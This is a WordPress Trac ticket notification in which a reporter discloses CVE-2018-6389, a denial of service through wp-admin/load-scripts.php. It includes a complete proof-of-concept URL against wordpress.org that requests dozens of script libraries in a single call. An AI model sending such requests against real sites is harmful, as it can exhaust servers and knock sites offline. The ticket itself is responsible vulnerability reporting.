[wp-trac] [WordPress Trac] #44943: Using component with Known Vulnerability - Unpatched WordPress leading to DoS
WordPress Trac
noreply at wordpress.org
Fri Sep 14 05:52:57 UTC 2018
#44943: Using component with Known Vulnerability - Unpatched WordPress leading to
DoS
------------------------------+-----------------------------
Reporter: frontdoorpentest | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Keywords:
Focuses: |
------------------------------+-----------------------------
I would like to report a vulnerability that is categorized under
"A9:2017-Using Components with Known Vulnerabilities" and can lead to
denial of service.
Please read the report , before marking as not valid because of DoS (
Note:- there has been no attempt made to DoS the freshbooks web
application )
Vulnerability:- https://wordpress.org/ uses word press as a backend engine
to run its web application and using CVE-2018-6389 an anonymous user can
cause Denial of service. In this vulnerability an attacker will pass all
the possible javascript library and the application tries to load all the
functions and send it back in response. Passing a large list of js
functions can consume lot processing to responed back and if done from
various location/ips/browser tabs can lead to DoS. This attack can lead to
generate upto 3mb size response per request.
Url :- https://wordpress.org/wp-admin/load-scripts.php?load=eutil,common
,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-
response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-
lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-
dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound
,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-
migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-
effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-
explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight
,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-
effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-
transfer
Possible fixes:-
1. change default "admin" directory name (Security through obscurity)
2. or apply some password protection to /wp-admin/ url
Impact:-
DoS of the site and application server
Please find the attached screenshot demonstrating the PoC.
Reference:-
https://hackerone.com/reports/335177
https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-
websites.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Note: - My intention was never to hamper this platform in any manner just
wanted to report in a responsible way.
Attachments area
--
Ticket URL: <https://core.trac.wordpress.org/ticket/44943>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list